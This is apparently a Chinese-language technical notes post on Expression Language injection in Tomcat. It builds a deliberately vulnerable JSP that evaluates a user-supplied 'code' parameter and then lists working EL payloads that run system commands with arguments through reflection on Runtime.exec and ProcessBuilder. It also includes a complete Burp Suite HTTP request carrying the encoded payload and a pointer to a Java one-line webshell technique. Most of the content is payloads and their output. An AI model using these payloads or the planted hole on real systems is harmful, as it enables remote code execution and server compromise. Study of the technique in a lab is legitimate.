tomcat,el表达式执行带参数命令,字符串数组,String[],el表达式注入
准备环境:
docker pull tomcat:8;
docker run --name tomcat8 -p 808:8080 -v /tmp/CC:/usr/local/tomcat/webapps/ -d tomcat:8;
如下为 /tmp/CC/app/index.jsp
<%@ page language="java" contentType="text/html; charset=UTF-8" pageEncoding="UTF-8" isELIgnored="false" %>
<%@ page import="org.apache.jasper.runtime.PageContextImpl" %>
<%
String codeParam = request.getParameter("code");
String input = (codeParam != null && !codeParam.isEmpty()) ? codeParam : "";
out.println("Input: " + input + "<br>");
String res = (String) PageContextImpl.proprietaryEvaluate(input, String.class, pageContext, null);
out.println(res);
Boolean re2 = (Boolean) PageContextImpl.proprietaryEvaluate("${(4*2) > 0 && 2 > 0}", Boolean.class, pageContext, null);
out.println(re2);
Long re4 = (Long) PageContextImpl.proprietaryEvaluate("${(4*2) > 0 && 2 > 0 ? 8 : 0}", Long.class, pageContext, null);
out.println(re4);
%>
那么code可以为:
code=${a123=["ping","-c","30","127.1"];a123.getClass()}
输出:class java.util.ArrayList
${a123=["ping","-c","21","127.1"];a123.toString()}
#输出:[ping, -c, 21, 127.1]
${a123="ping,-c,28,127.1";a123.toString().split(",").getClass()}
#输出:class [Ljava.lang.String;
${a123="touch,/tmp/Z";b1=a123.split(",");b123=b1.getClass();a12=''.getClass().forName("java.lang.Runtime");a12.getMethod("exec",b123).invoke(a12.getMethod("getRuntime").invoke(null),b1)}
#输出Process[pid=806, exitValue="not exited"]
是仿照这句话改造的:
${a123=javax.script.ScriptEngineManager.newInstance();a123.getEngineByName("JavaScript").eval("java.lang.Runtime.getRuntime().exec('calc.exe')")}
BurpSuite 的repeater :
POST /app/index.jsp HTTP/1.1
Host: 127.0.0.1:8088
sec-ch-ua: "Chromium";v="97", " Not;A Brand";v="99"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.99 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=5CA5923F898DF72C4FC49863E68A9257
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 563
code=${a123%3d"touch,/tmp/Z"%3bb1%3da123.split(",")%3bb123%3db1.getClass()%3ba12%3d''.getClass().forName("java.lang.Runtime")%3ba12.getMethod("exec",b123).invoke(a12.getMethod("getRuntime").invoke(null),b1)}
如下可以用
code=${Runtime.getRuntime().exec("ping,-c,28,127.1".split(","))}
#这样也可以的,输出 Process[pid=825, exitValue="not exited"]
但是如下就不行了,原因不明:
code=${java.lang.Runtime.getRuntime().exec("ping,-c,28,127.1".split(","))}
仅仅加了开头的: java.lang
附赠java.lang.ProcessBuilder类执行带参数命令:
${a="".getClass().forName("java.lang.ProcessBuilder");b=a.getDeclaredConstructor("".split(",").getClass());c=b.newInstance("ping,-c,78,127.1".split(","));c.start()}
如下代码失败,原因不明:
${a=java.lang.ProcessBuilder.newInstance("ping,-c,178,127.1".split(","));a.start()}
#失败
${a=ProcessBuilder.newInstance("ping,-c,178,127.1".split(","));a.start()}
#失败
参考:
一种新型Java一句话木马的实现 - yzddmr6
https://cn-sec.com/archives/712733.html